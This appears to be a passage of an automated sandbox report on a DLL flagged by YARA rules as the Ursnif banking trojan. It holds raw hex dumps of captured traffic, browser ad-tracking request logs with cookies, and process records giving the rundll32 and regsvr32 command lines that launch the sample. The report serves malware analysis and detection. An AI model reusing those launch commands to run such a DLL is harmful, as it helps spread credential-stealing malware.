b0 dc af cb ce af 5b 74 ac c2 ff 00 46 46 31 8a e0 c6 aa 56 20 4f cc 82 4a a2 8d ce ad 5d ca 0e 1e d0 c8 45 e1 62 c4 d2 1e 8c 42
                                                                                                                                                                                                                                                                                  Data Ascii: +uT`JVd>qgsfu}-ylMSU$`5=8fp,'80pwP=?faE7p!G[xIlG "*td88z1-!1q#ir*V8A/77Z-JQP6q[tFF1V OJ]EbB
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC136INData Raw: 84 3c a3 91 67 94 b0 12 bc 8c aa 9b f1 2f ba f8 61 aa d8 64 be d6 ad cb 1c b6 62 b2 b4 e4 7e 73 ed 34 21 e5 66 e6 e9 f1 11 21 24 91 cb be b0 16 68 4a b0 cb 35 8a 90 cf 2d 93 62 5d b9 97 86 71 01 8b a9 f7 6f df 7f 3a f5 45 88 9e 29 2d d0 ab 53 a1 5e 29 a2 fb cc 72 43 12 3f 18 dd 07 9e 60 ea fe 36 d5 58 cc c6 86 0f 27 33 8a e5 49 12 92 8e 81 fe 9f 01 bb 0e dc b5 92 4a 0d 6c cb 62 8d dc 5c dc 26 25 ca da 06 62 80 3b 30 23 67 ea 82 df 8d 63 56 ed 04 ad 3d 4a 77 2f c9 62 a4 32 09 0f 39 90 47 13 13 21 1d f6 63 ac 65 7b 50 54 95 e9 18 64 d8 47 33 ca a5 42 09 48 e4 bc 51 55 c1 1e 0e fa 9e ce 42 ee 16 78 ad 4b ca c7 46 68 e2 85 98 81 1a aa 45 cd 88 ec ff 00 80 08 03 52 5c b3 53 fe 26 c7 3e 4d 85 70 92 c1 3e 4a 09 e8 b4 48 86 52 0a f2 64 5f bc f1 03 56 6c b9 8b 2c
                                                                                                                                                                                                                                                                                  Data Ascii: <g/adb~s4!f!$hJ5-b]qo:E)-S^)rC?`6X'3IJlb\&%b;0#gcV=Jw/b29G!ce{PTdG3BHQUBxKFhER\S&>Mp>JHRd_Vl,
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC137INData Raw: b8 3c 4c e1 e4 6f 0e d0 00 46 c8 18 ea 14 af 8c 9f dc c8 a2 bb 4a 07 05 25 59 39 95 fa a1 bb a6 82 56 bb 89 f7 55 c5 94 51 24 4f 3c b0 59 88 8e 3d f9 ba 47 26 fc 37 61 b1 5d 59 c6 5c bf 5d 6a e4 6b 04 7f 76 95 eb 09 a2 2d 60 10 87 8b 97 41 b7 fc 87 72 35 3b 59 80 da 0b 2c 6a df 02 97 19 79 ef fe 56 51 b1 d5 bc 9d 3a b7 ab 25 e9 a2 97 db f4 11 d9 e6 58 08 94 10 18 12 fb 72 50 09 1b 8d 0b d8 c9 6b 45 48 50 af 38 90 cc 6d 48 1d 65 25 08 52 62 ec a8 46 eb bf 81 ac ee 43 d4 50 35 aa cf 62 ed 36 7a 16 e4 8b e7 22 d7 2b c0 f1 f9 76 e6 7f 6c 54 eb 0d 4a a5 a8 e0 7c a6 4e ad 54 e5 55 61 08 19 61 e1 c0 37 65 d8 2f 60 58 ef be aa 63 4c f0 cf c6 49 a7 8c 5e 31 44 8a a2 57 f6 f0 f2 2c 24 f9 85 3b a9 3a 7c ad bb db cb b3 c2 63 a9 57 da 6f ed e3 e5 0b b2 bc a4 af 74 e3
                                                                                                                                                                                                                                                                                  Data Ascii: <LoFJ%Y9VUQ$O<Y=G&7a]Y\]jkv-`Ar5;Y,jyVQ:%XrPkEHP8mHe%RbFCP5b6z"+vlTJ|NTUaa7e/`XcLI^1DW,$;:|cWot
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC139INData Raw: dd 7a bc 95 15 10 ef 1f 13 aa 32 e3 d5 4b 3d d1 61 0c 28 ab e4 b3 ef b0 03 59 1f 59 5c 89 c2 cf 7a 0a 53 cf 46 1f f6 11 0e 52 6a d6 1b 39 67 24 64 96 f3 63 06 2e b8 46 5d e5 13 bc 9d 25 28 dc 47 27 24 b6 b0 2d 5a c2 d6 b1 50 c7 37 5d e2 85 9b 89 29 1a 09 5f 9b 14 25 54 9e cb a9 7a b4 ea f4 71 98 e7 82 68 af db 13 cb c8 cc 48 57 6e 08 a8 c0 fc b6 db 8e a4 59 33 1e a4 b1 52 25 86 68 b8 04 5a ea 47 e7 8e c8 27 db 70 78 a8 d1 ab 97 97 25 24 90 d0 ab 18 50 12 27 52 8b 26 ec 14 2f 7d cb 37 76 ee 40 60 77 d4 e3 29 66 38 1e ba 59 61 22 fd 69 43 28 11 81 c5 c9 fc 31 f1 df 58 a5 93 11 93 8b 8e 41 0f 4e ab c0 d3 7c d5 bb 00 92 3a f7 0b fe 70 46 dd c1 d5 fb d1 e1 44 77 ec 58 09 1c 94 b9 d6 56 4e 0b 2c d1 6c ee 8c c7 62 8b b1 63 ac a5 8b 11 19 24 00 cc 65 81 6a 86 06
                                                                                                                                                                                                                                                                                  Data Ascii: z2K=a(YY\zSFRj9g$dc.F]%(G'$-ZP7])_%TzqhHWnY3R%hZG'px%$P'R&/}7v@`w)f8Ya"iC(1XAN|:pFDwXVN,lbc$ej


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49804 | 172.217.168.38 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:51 UTC | 12 | OUT | GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Host: ad.doubleclick.net
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cookie: IDE=AHWqTUmYUECPaufv9uO9HoZuaxRLSg5dGz_-QhiA_NR2P4lElZyv3fzE7AZa07XP
2021-10-07 13:51:51 UTC | 12 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media"
                                                                                                                                                                                                                                                                                  Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]}
                                                                                                                                                                                                                                                                                  Content-Length: 1078
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 06:41:48 GMT
                                                                                                                                                                                                                                                                                  Expires: Fri, 08 Oct 2021 06:41:48 GMT
                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 08 May 2012 13:08:06 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                  Age: 25803
                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49811 | 142.250.203.98 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:52 UTC | 15 | OUT | GET /pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzExNjY4NDE2ODAwMFYxMA%3D%3D&google_sc=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Host: cm.g.doubleclick.net
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cookie: IDE=AHWqTUmYUECPaufv9uO9HoZuaxRLSg5dGz_-QhiA_NR2P4lElZyv3fzE7AZa07XP
2021-10-07 13:51:52 UTC | 16 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                  Location: https://cs.media.net/cksync?type=g&cs=1&google_gid=CAESENlypXSQarzyPfZadJregtU&google_cver=1
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:52 GMT
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Server: HTTP server (unknown)
                                                                                                                                                                                                                                                                                  Content-Length: 301
                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                  Set-Cookie: IDE=AHWqTUlHPkNa6plymW9JTgSNVG2qEeIJ_G_IptnSH_2mFtME07xAKM_VEZoF-OQ-Uys; expires=Mon, 25-Oct-2021 07:24:04 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                                                                                  Connection: close
2021-10-07 13:51:52 UTC | 17 | IN | Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://cs.media.net/cksync?type=g&amp;cs=1&amp;google_gid=CAESENlypXSQarzyPfZadJregtU&


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49813 | 18.156.81.187 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:52 UTC | 17 | OUT | GET /sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Host: x.bidswitch.net
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:52 UTC18INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:52 GMT
                                                                                                                                                                                                                                                                                  Location: https://x.bidswitch.net/ul_cb/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1
                                                                                                                                                                                                                                                                                  Set-Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure
                                                                                                                                                                                                                                                                                  Set-Cookie: c=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure
                                                                                                                                                                                                                                                                                  Set-Cookie: tuuid_lu=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure
                                                                                                                                                                                                                                                                                  Set-Cookie: c=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Connection: Close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49812 | 18.156.81.187 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:52 UTC | 19 | OUT | GET /ul_cb/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: x.bidswitch.net
Connection: Keep-Alive
Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; c=1633614712; tuuid_lu=1633614712
2021-10-07 13:51:52 UTC | 19 | IN | HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Date: Thu, 07 Oct 2021 13:51:52 GMT
Location: //rtb.mfadsrvr.com/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375
Set-Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure
Set-Cookie: tuuid_lu=1633614712; path=/; expires=Fri, 07-Oct-2022 13:51:52 GMT; domain=.bidswitch.net; samesite=none; secure
Content-Length: 0
Connection: Close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49815 | 35.244.174.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:52 UTC | 20 | OUT | GET /710489.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: id.rlcdn.com
Connection: Keep-Alive
2021-10-07 13:51:52 UTC | 20 | IN | HTTP/1.1 451 Unavailable For Legal Reasons
Date: Thu, 07 Oct 2021 13:51:52 GMT
Content-Length: 0
Via: 1.1 google
Alt-Svc: clear
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49820 | 76.223.111.131 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:52 UTC | 21 | OUT | GET /track/cmf/generic?ttd_pid=8m33zk4&ttd_tpi=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: match.adsrvr.org
Connection: Keep-Alive
2021-10-07 13:51:53 UTC | 21 | IN | HTTP/1.1 302 Found
Date: Thu, 07 Oct 2021 13:51:52 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: private,no-cache, must-revalidate
Pragma: no-cache
Location: https://match.adsrvr.org/track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1
X-AspNet-Version: 4.0.30319
Set-Cookie: TDID=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:52 GMT; path=/; secure; SameSite=None
Set-Cookie: TDCPM=CAEYBSgCMgsI_s7Dl4vphDoQBTgB; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:52 GMT; path=/; secure; SameSite=None
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
2021-10-07 13:51:53 UTC | 22 | IN | Data Ascii: Redirecting to: <a href="https://match.adsrvr.org/track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1">https://match.adsrvr.org/track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1</a>


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                  9192.168.2.44981976.223.111.131443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:53 UTC22OUTGET /track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                                                                  Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
                                                                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                  Host: match.adsrvr.org
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cookie: TDID=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b; TDCPM=CAEYBSgCMgsI_s7Dl4vphDoQBTgB
2021-10-07 13:51:53 UTC 22 IN HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:53 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                  Content-Length: 199
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Cache-Control: private,no-cache, must-revalidate
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Location: https://cs.media.net/cksync?cs=1&type=ttd&ovsid=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b
                                                                                                                                                                                                                                                                                  X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                  Set-Cookie: TDID=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:53 GMT; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: TDCPM=CAEYBSABKAIyCwj-zsOXi-mEOhAFOAE.; domain=.adsrvr.org; expires=Fri, 07-Oct-2022 13:51:53 GMT; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                  P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
                                                                                                                                                                                                                                                                                  Data Ascii: Redirecting to: <a href="https://cs.media.net/cksync?cs=1&type=ttd&ovsid=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b">https://cs.media.net/cksync?cs=1&type=ttd&ovsid=aa6413c2-4ba3-4951-8cf4-a124e7cfad6b</a>


                                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:51:31
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\a04.dll'
                                                                                                                                                                                                                                                                                  Imagebase:0x10000
                                                                                                                                                                                                                                                                                  File size:893440 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:51:32
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
                                                                                                                                                                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:51:32
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\a04.dll
                                                                                                                                                                                                                                                                                  Imagebase:0xc00000
                                                                                                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:51:32
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
                                                                                                                                                                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
